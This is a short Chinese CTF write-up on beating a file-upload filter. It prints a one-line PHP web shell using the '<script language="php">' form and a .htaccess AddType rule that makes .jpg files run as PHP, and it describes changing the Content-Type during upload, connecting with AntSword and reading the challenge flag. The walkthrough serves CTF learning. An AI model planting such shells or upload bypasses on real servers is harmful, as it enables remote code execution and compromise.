flagflag打开网站,先上传一个.php试试。
提示后缀名不能有ph。
这里想到了之前在ctfhub技能树上做过一道题目,可以上传.htaccess文件,来实现把后缀名为其它类型的转换成php执行,所以这里使用这个方法来上传。
不了解.htaccess的可以先看这篇文章,之后会用到。
开始上传,先编写好一个一句话木马
然后把它改成jpg文件进行上传。
发现出现
这里应该是过滤掉了php代码标志。
那么我们再次进行抓包,查看一下是否又其他可用信息。
在这里我们看到该网站的php为5.6.23版本。
经过查询,了解到php版本在7.0以下可以执行
<script language="php">xxx</script>来代替php。
所以这里重新写入一句话木马为
<script language="php">eval($_POST['123']);</script>然后修改文件后缀名为.jpg再次进行上传。
上传成功!!!
之后编写.htaccess文件
AddType application/x-httpd-php .jpg之后进行上传,抓包
修改application/octet-stream为image/jpeg后放包。
访问上传后图片的地址,之后使用蚁剑进行连接即可。
连接后在根目录中找到flag。
flag{c5741452-3492-43f1-b22c-c60d42e19d48}
477
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
